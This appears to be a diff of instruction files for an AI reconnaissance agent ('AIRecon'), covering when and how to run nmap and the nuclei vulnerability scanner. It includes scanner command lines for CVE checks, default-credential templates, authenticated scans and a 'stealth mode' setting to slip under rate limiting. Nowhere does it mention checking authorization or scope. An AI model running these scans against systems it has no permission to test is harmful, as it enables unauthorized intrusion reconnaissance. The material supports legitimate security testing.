- Is it the expected configuration or an anomaly?
|
|
172
|
+
- Is there a specific, plausible vulnerability for this version that warrants testing?
|
|
173
|
+
|
|
174
|
+
---
|
|
175
|
+
|
|
176
|
+
## Version Information — The Correct Follow-Up Workflow
|
|
177
|
+
|
|
178
|
+
When nmap returns a specific version (e.g., "Apache Tomcat 9.0.35"):
|
|
179
|
+
|
|
180
|
+
DO:
|
|
181
|
+
1. Note the exact version string.
|
|
182
|
+
2. Manually search for known CVEs: web_search "Apache Tomcat 9.0.35 CVE"
|
|
183
|
+
3. Read the CVE description — understand what the vulnerability actually is.
|
|
184
|
+
4. Determine: is this application's usage pattern consistent with the vulnerable code path?
|
|
185
|
+
5. If yes: manually craft a targeted test or use a specific CVE template (not a generic scan).
|
|
186
|
+
|
|
187
|
+
DO NOT:
|
|
188
|
+
→ Run a generic "vuln" NSE script category against it.
|
|
189
|
+
→ Load the host into a vulnerability scanner "to check for CVEs."
|
|
190
|
+
→ Assume the version is vulnerable without reading the CVE conditions.
|
|
191
|
+
|
|
192
|
+
---
|
|
193
|
+
|
|
194
|
+
## Workflow Integration (Where nmap/naabu Fit)
|
|
195
|
+
|
|
196
|
+
Phase 1 STEP 2 (Live Host Detection):
|
|
197
|
+
naabu or light nmap for reachability and common port check across resolved hosts.
|
|
198
|
+
Output: feeds into host prioritization — NOT into scanners.
|
|
199
|
+
|
|
200
|
+
Phase 1 STEP 3 (Manual Profiling):
|
|
201
|
+
Full port scan of each specific host being profiled (one at a time).
|
|
202
|
+
Output: recorded directly into output/host_profiles.json for that host.
|
|
203
|
+
|
|
204
|
+
Phase 2+ (Targeted Service Investigation):
|
|
205
|
+
Single-port deep scans on specific interesting services discovered during profiling.
|
|
206
|
+
Always followed by manual investigation of the discovered service.
|
|
207
|
+
|
|
208
|
+
NEVER:
|
|
209
|
+
Scan a list of hosts in bulk and immediately pipe results into a vulnerability scanner.
|
|
210
|
+
Use the "vuln" NSE script category at any phase.
|
|
211
|
+
Treat scan results as findings — they are starting points for manual investigation.
|
|
@@ -0,0 +1,175 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# Nuclei — Usage Guide for AIRecon
|
|
4
|
+
|
|
5
|
+
Nuclei is a template-based vulnerability scanner. It is powerful ONLY when used with the right
|
|
6
|
+
context. Without knowing the target's tech stack and input surface first, nuclei produces noise —
|
|
7
|
+
not findings. Treat it as a precision instrument, not a spray can.
|
|
8
|
+
|
|
9
|
+
---
|
|
10
|
+
|
|
11
|
+
## DECIDE FIRST: Full Recon vs Specific Task
|
|
12
|
+
|
|
13
|
+
Read the user's request and apply the correct mode:
|
|
14
|
+
|
|
15
|
+
[FULL RECON] — "recon target.com", "full pentest", "bug bounty recon"
|
|
16
|
+
→ All 5 pre-conditions below MUST be satisfied before nuclei.
|
|
17
|
+
→ Do not shortcut. Gate is strict.
|
|
18
|
+
|
|
19
|
+
[SPECIFIC TASK] — "scan this endpoint for CVEs", "check if nginx version X is vulnerable",
|
|
20
|
+
"test this URL for misconfigs", "I already know it's WordPress 5.9"
|
|
21
|
+
→ Use the SPECIFIC TASK FAST PATH below.
|
|
22
|
+
→ Skip host_profiles.json requirement if you have gathered equivalent info in this session.
|
|
23
|
+
|
|
24
|
+
---
|
|
25
|
+
|
|
26
|
+
## SPECIFIC TASK FAST PATH (for targeted, scoped nuclei use)
|
|
27
|
+
|
|
28
|
+
When the user gives you a specific host + specific technology or vulnerability class:
|
|
29
|
+
|
|
30
|
+
You MAY run nuclei immediately if ALL of these are true:
|
|
31
|
+
[x] You know the exact target URL (not a list of unknowns)
|
|
32
|
+
[x] You know what technology/framework is running (from user, from curl headers, from JS)
|
|
33
|
+
[x] You have a specific template category or CVE ID in mind — NOT the entire template library
|
|
34
|
+
[x] You are NOT doing bulk scanning (no -l with unexamined host lists)
|
|
35
|
+
|
|
36
|
+
Example legitimate fast-path use:
|
|
37
|
+
User: "check if login.target.com Grafana is vulnerable to CVE-2021-43798"
|
|
38
|
+
→ nuclei -u https://login.target.com -id CVE-2021-43798 -o output/nuclei_grafana_cve.txt
|
|
39
|
+
→ No host_profiles.json required. No phase gate. Run immediately.
|
|
40
|
+
|
|
41
|
+
User: "I found /actuator/env exposed, check for Spring misconfigs"
|
|
42
|
+
→ nuclei -u https://target.com/actuator -t http/misconfiguration/springboot.yaml
|
|
43
|
+
→ Fine. You already have the endpoint from manual finding.
|
|
44
|
+
|
|
45
|
+
STILL FORBIDDEN even in specific task mode:
|
|
46
|
+
✗ nuclei -l output/live_hosts.txt -t http/ (bulk + all templates)
|
|
47
|
+
✗ nuclei -u target.com -t http/ (whole category without justification)
|
|
48
|
+
✗ nuclei on any URL from crawler output without reading what it does first
|
|
49
|
+
|
|
50
|
+
---
|
|
51
|
+
|
|
52
|
+
## MANDATORY PRE-CONDITIONS (Full Recon mode only)
|
|
53
|
+
|
|
54
|
+
Before nuclei can be used in a FULL RECON engagement, all must be satisfied:
|
|
55
|
+
|
|
56
|
+
[ ] The host has been manually visited in the browser — you have seen what the application does.
|
|
57
|
+
[ ] The technology stack is confirmed from observed evidence (response headers, JS, error pages).
|
|
58
|
+
[ ] At least 3 distinct endpoints have been manually probed and their behavior documented.
|
|
59
|
+
[ ] output/host_profiles.json contains a complete profile for this specific host.
|
|
60
|
+
[ ] You have selected a specific template category that matches the CONFIRMED tech stack.
|
|
61
|
+
|
|
62
|
+
If any condition is unmet: do NOT use nuclei. Continue manual analysis until conditions are met.
|
|
63
|
+
|
|
64
|
+
USING NUCLEI WITHOUT A HOST PROFILE IN FULL RECON MODE IS A TASK FAILURE.
|
|
65
|
+
|
|
66
|
+
IF YOU ARE STUCK trying to satisfy these conditions and the user asked for a SPECIFIC TASK (not full recon), re-read "SPECIFIC TASK FAST PATH" above and proceed accordingly.
|
|
67
|
+
|
|
68
|
+
---
|
|
69
|
+
|
|
70
|
+
## What Nuclei Is Good At (After Manual Analysis)
|
|
71
|
+
|
|
72
|
+
Once you understand the target, nuclei excels at:
|
|
73
|
+
|
|
74
|
+
- Confirming suspected misconfigurations already identified via manual observation
|
|
75
|
+
- Fingerprinting exact versions of a known framework (use technology templates)
|
|
76
|
+
- Checking for known CVEs in a framework version you have already identified
|
|
77
|
+
- Detecting blind/OOB vulnerabilities (SSRF, RCE) at specific endpoints you have already mapped
|
|
78
|
+
- Testing specific vulnerability classes against endpoints you have manually found and understood
|
|
79
|
+
|
|
80
|
+
What nuclei is BAD at (and must NOT be used for):
|
|
81
|
+
- Replacing manual application understanding
|
|
82
|
+
- Discovering what an application does (that is browser + curl's job)
|
|
83
|
+
- Bulk-scanning a list of unknown hosts to "see what comes up"
|
|
84
|
+
|
|
85
|
+
---
|
|
86
|
+
|
|
87
|
+
## Template Selection — Context Required
|
|
88
|
+
|
|
89
|
+
Template categories and their mandatory prerequisites:
|
|
90
|
+
|
|
91
|
+
TECHNOLOGY FINGERPRINTING (http/technologies/)
|
|
92
|
+
Prerequisite: You suspect a specific framework but need version confirmation.
|
|
93
|
+
Use: After manually identifying the framework from headers or JS.
|
|
94
|
+
Select: Only templates matching the confirmed framework name.
|
|
95
|
+
|
|
96
|
+
MISCONFIGURATION DETECTION (http/misconfiguration/)
|
|
97
|
+
Prerequisite: You have observed behavior suggesting a misconfiguration (e.g., directory listing,
|
|
98
|
+
exposed config endpoint, CORS wildcard in response header you read manually).
|
|
99
|
+
Use: To confirm and document a suspected misconfiguration.
|
|
100
|
+
Select: Only templates relevant to the specific misconfiguration type observed.
|
|
101
|
+
|
|
102
|
+
CVE SCANNING (http/vulnerabilities/, cves/)
|
|
103
|
+
Prerequisite: You have confirmed the exact software name AND version from real evidence.
|
|
104
|
+
Use: To check if the confirmed version is affected by specific CVEs.
|
|
105
|
+
Select: Only CVE templates for the confirmed software + version. Never run all CVE templates.
|
|
106
|
+
|
|
107
|
+
OOB / BLIND DETECTION (tags: oast, ssrf, rce)
|
|
108
|
+
Prerequisite: You have a specific endpoint or parameter that you manually identified as a
|
|
109
|
+
potential blind injection point. You have an active interactsh listener running.
|
|
110
|
+
Use: To confirm blind behavior at a SPECIFIC known endpoint — not across all URLs.
|
|
111
|
+
Select: Only templates matching the injection class you suspect at that specific endpoint.
|
|
112
|
+
|
|
113
|
+
DEFAULT CREDENTIALS / LOGIN PANELS (http/default-logins/, tags: panel)
|
|
114
|
+
Prerequisite: You have manually confirmed a login panel exists at a specific path.
|
|
115
|
+
Use: To check for default credentials on that specific panel type (e.g., confirmed Grafana login).
|
|
116
|
+
Select: Only templates for the confirmed panel software.
|
|
117
|
+
|
|
118
|
+
DNS / NETWORK / SSL (dns/, network/, ssl/)
|
|
119
|
+
Prerequisite: You have resolved hostnames and understand the infrastructure.
|
|
120
|
+
Use: For domain takeover checks on subdomains showing NXDOMAIN on CNAME targets,
|
|
121
|
+
or TLS misconfiguration checks after port scanning confirms HTTPS services.
|
|
122
|
+
Select: Appropriate category only.
|
|
123
|
+
|
|
124
|
+
---
|
|
125
|
+
|
|
126
|
+
## Usage Pattern (After Pre-Conditions Are Met)
|
|
127
|
+
|
|
128
|
+
The correct pattern is: SPECIFIC TARGET + SPECIFIC TEMPLATES — not lists + all templates.
|
|
129
|
+
|
|
130
|
+
Targeting a single confirmed host with confirmed tech:
|
|
131
|
+
nuclei -u <specific_host> -t http/technologies/<confirmed_framework>.yaml
|
|
132
|
+
|
|
133
|
+
Targeting a specific endpoint with confirmed vulnerability class:
|
|
134
|
+
nuclei -u <specific_url_with_params> -t http/vulnerabilities/<class>/
|
|
135
|
+
|
|
136
|
+
Targeting confirmed CVE on confirmed software version:
|
|
137
|
+
nuclei -u <specific_host> -id <cve-id>
|
|
138
|
+
|
|
139
|
+
Authenticated scan on a confirmed authenticated surface:
|
|
140
|
+
nuclei -u <specific_host> -H "Authorization: Bearer <token>" -t http/misconfiguration/
|
|
141
|
+
|
|
142
|
+
Stealth mode when target shows rate limiting behavior:
|
|
143
|
+
Add: -rl 5 -c 2 -delay 3
|
|
144
|
+
|
|
145
|
+
NEVER use these patterns:
|
|
146
|
+
nuclei -l output/live_hosts.txt (no template filter, no prior analysis)
|
|
147
|
+
nuclei -l output/live_hosts.txt -t http/ (entire category on unknown hosts)
|
|
148
|
+
nuclei -l output/urls_all_deduped.txt (raw crawler output as scanner input)
|
|
149
|
+
|
|
150
|
+
---
|
|
151
|
+
|
|
152
|
+
## Output and Triage
|
|
153
|
+
|
|
154
|
+
Write output: -o output/nuclei_<context>.txt (e.g., nuclei_grafana_cve.txt)
|
|
155
|
+
For JSON output: -json -o output/nuclei_<context>.json
|
|
156
|
+
|
|
157
|
+
After nuclei completes:
|
|
158
|
+
1. Read every finding manually — do NOT accept nuclei output as confirmed vulnerability.
|
|
159
|
+
2. For every finding marked [medium] or above: manually reproduce it with curl or browser.
|
|
160
|
+
3. Only escalate to create_vulnerability_report after manual verification with working PoC.
|
|
161
|
+
4. Discard informational findings unless they inform a manual attack chain.
|
|
162
|
+
|
|
163
|
+
A nuclei finding is NOT a vulnerability. It is a signal that requires manual verification.
|
|
164
|
+
|
|
165
|
+
---
|
|
166
|
+
|
|
167
|
+
## Workflow Integration (Where Nuclei Fits)
|
|
168
|
+
|
|
169
|
+
Phase 1 (Manual Profiling): DO NOT use nuclei.
|
|
170
|
+
Phase 2 (Bespoke Expansion): Nuclei may be used ONLY for fingerprinting confirmed frameworks.
|
|
171
|
+
Phase 3+ (Logic & Auth Testing): Nuclei may support OOB blind detection at specific endpoints.
|
|
172
|
+
Phase 4+ (Vulnerability Chaining): Nuclei may confirm suspected CVEs on confirmed versions.
|
|
173
|
+
|
|
174
|
+
Nuclei is a supporting instrument for hypotheses formed through manual analysis.
|
|
175
|
+
It is never the primary discovery mechanism.
|